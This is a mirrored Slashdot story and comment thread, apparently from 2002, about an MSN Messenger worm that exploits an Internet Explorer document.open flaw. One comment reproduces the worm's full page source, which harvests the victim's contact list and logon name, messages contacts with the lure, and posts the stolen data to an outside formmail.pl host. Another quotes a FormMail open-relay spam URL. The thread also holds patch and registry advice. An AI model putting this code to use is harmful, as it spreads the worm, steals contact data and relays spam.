Slashdot Mirror
Microsoft Instant Messenger Virus Sweeps Net
Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.
There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.
Sophistication: moderate. Damage: only your pride.
Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.
Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?
Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
8 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F7956
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.
Install the patch and be done with it.
Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.
--- If stupidity got us into this mess, why can it get us out?
the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P
The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.
Damnit, Jim, I'm an anarchist, not a F@#$!^& doctor!
You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
Looks fine to me..:)
BWP
Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.
% 20send%20anonymous%20spam.
Formmail.pl Can Be Used As An Open Mail Relay
Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.
Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).
Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to
Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.
Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
--It's Pimptastic!--
According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
"None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.
;)
I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?
Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.
That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.
-l
P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company.
Look closely:
...
<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">
I think somebody forgot that HTML source can be viewed
The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
--
If code was hard to write, it should be hard to read
People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?
Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.
How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...
And it's better to find out about these things in the news, not the hard way!
Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.
It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.
For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.
Test your net with Netalyzr
A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.
You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.
1 -0 0C04F795683}
4 -0 000F875C541}
Remove the following registry keys:
HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A44
HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D9
HKEY_CLASSES_ROOT\Messenger.MsgrObject
and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...
You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.
You'll need to remove them again if you upgrade or reinstall - it'll put the references back.
Convictions are more dangerous enemies of truth than lies.
- Nietzsche
We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.
We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.
This new worm, although harmless, is a direct rip of the example code from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.
As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.
The next MSN worm might be far worse.
Please, please all Internet Explorer users patch your systems now. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.
I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?